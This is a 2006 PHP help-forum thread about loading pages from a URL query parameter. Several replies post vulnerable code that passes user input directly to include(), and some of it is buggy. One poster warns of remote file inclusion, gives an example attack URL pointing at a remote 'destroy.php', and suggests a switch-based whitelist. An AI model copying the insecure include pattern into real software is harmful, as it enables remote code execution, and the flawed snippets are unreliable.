Jump to content

include file from url query

mccabre1

By mccabre1
in PHP Coding Help

 Share

Recommended Posts

mccabre1 Newbie

mccabre1

Posted
Posted
Hi, I'm trying to include files in my 'index.php' page based on the url. My menu links to:

index.php?page=home
index.php?page=news
index.php?page=contact

then I want to include the content based on that url, so if it reads 'index.php?page=home' it will load 'home.php'.

I currently have this line of code to call the file:
[code]
<? include ("$page.php"); ?>
[/code]

Now, when I load my page it can't find the file and doesn't recognise the 'page=' bit of the url.

Can anyone tell me what I'm doing wrong??

Thanks.
C
Link to comment
https://forums.phpfreaks.com/topic/3449-include-file-from-url-query/
Share on other sites
mccabre1 Newbie

mccabre1

Posted
  • Author
Posted
[!--quoteo(post=346437:date=Feb 16 2006, 05:26 PM:name=Darkness Soul)--][div class=\'quotetop\']QUOTE(Darkness Soul @ Feb 16 2006, 05:26 PM) [snapback]346437[/snapback][/div][div class=\'quotemain\'][!--quotec--]
May it works, i don't test ;)

[code]<?php
   $page = $_GET['page'];
   include $page;
?>[/code]

^~ if works, tell me, if wont, tell me too, so then i will test here and get the code..

bye
[/quote]

Yes! That's fantastic, thanks very much! I wrote the code out as follows:

[code]
<?
$page = $_GET['$page'];
include ("$page.php");
?>
[/code]

- '.php' is the file extension on my includes.

Thanks again,
Chris
Darkness Soul Member

Darkness Soul

Posted
Posted
Yep, that's the cool side of the for.. code!

You aways can use it for all pages with one code.. something like..

[code]<?php

   // Before headers
   $page = $_GET [ '$page' ];

   // Now, test the URL query for security {thanks another topic}
   if ( !is_file ( "$page.php" ) && $page != "" )
   {
      // File not found!!!
      header ( "location: index.php" );
   }
   // Are you in index?
   elseif ( $page == "" )
   {
      $page = "home";
   }

   // Inside <title></title> tags
   print "You are in ". $page";

   // Calling the specific page
   include ( "$page.php" );

   // (...)
?>[/code]

=)
Darkness Soul Member

Darkness Soul

Posted
Posted
If am I wrong, please tell me.. but, i think..

When you use " ", the PHP allow you to write variables inside, when you use ' ', you are not allowed to.

Like your include, test both of these:
[code]
// may work
require ( "$page.php" );
require ( $page .'.php' );

// may not work
require ( '$page' . '.php' );
require ( '$page.php' ); [/code]
=)
heckenschutze Newbie

heckenschutze

Posted
Posted
One very large problem with the code mentioned, is remote script execution is possible.

Eg if I made a script on my site that destroyed everything if run, I could tell your script to run/include it.

The following would work:

index.php?page=http://mysite.com/destroy[!--coloro:#CCCCCC--][span style=\"color:#CCCCCC\"][!--/coloro--][i].php[/i][!--colorc--][/span][!--/colorc--]

Therefore, causing destroy.php to be included into your page, as if it was a file on your site.

A common work around is to use switches:
[code]<?php

switch($_GET["page"])
{
    case "page1";
        $page = "page1.php";
        $title = "My page title.php";
    break;
    
    default:
        $page = "main.php";
        $title = "Home";
    break;
}

include $page;

?>[/code]

hth someone.
dude753 Newbie

dude753

Posted
Posted
[!--quoteo(post=347945:date=Feb 21 2006, 01:28 PM:name=heckenschutze)--][div class=\'quotetop\']QUOTE(heckenschutze @ Feb 21 2006, 01:28 PM) [snapback]347945[/snapback][/div][div class=\'quotemain\'][!--quotec--]
One very large problem with the code mentioned, is remote script execution is possible.

Eg if I made a script on my site that destroyed everything if run, I could tell your script to run/include it.

The following would work:

index.php?page=http://mysite.com/destroy[!--coloro:#CCCCCC--][span style=\"color:#CCCCCC\"][!--/coloro--][i].php[/i][!--colorc--][/span][!--/colorc--]

Therefore, causing destroy.php to be included into your page, as if it was a file on your site.

A common work around is to use switches:
[code]<?php

switch($_GET["page"])
{
    case "page1";
        $page = "page1.php";
        $title = "My page title.php";
    break;
    
    default:
        $page = "main.php";
        $title = "Home";
    break;
}

include $page;

?>[/code]

hth someone.
[/quote]
Could I also stick my site URL infront of the $page value? So that if someone tried to put their own URL in it would be [a href=\"http://mydomain.com/index.php?page=http://theirsite.com/destroy\" target=\"_blank\"]http://mydomain.com/index.php?page=http://...ite.com/destroy[/a]

Then $page would equal [a href=\"http://mydomain.com/http://theirsite.com/destroy\" target=\"_blank\"]http://mydomain.com/http://theirsite.com/destroy[/a] and this would give a 404.
This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.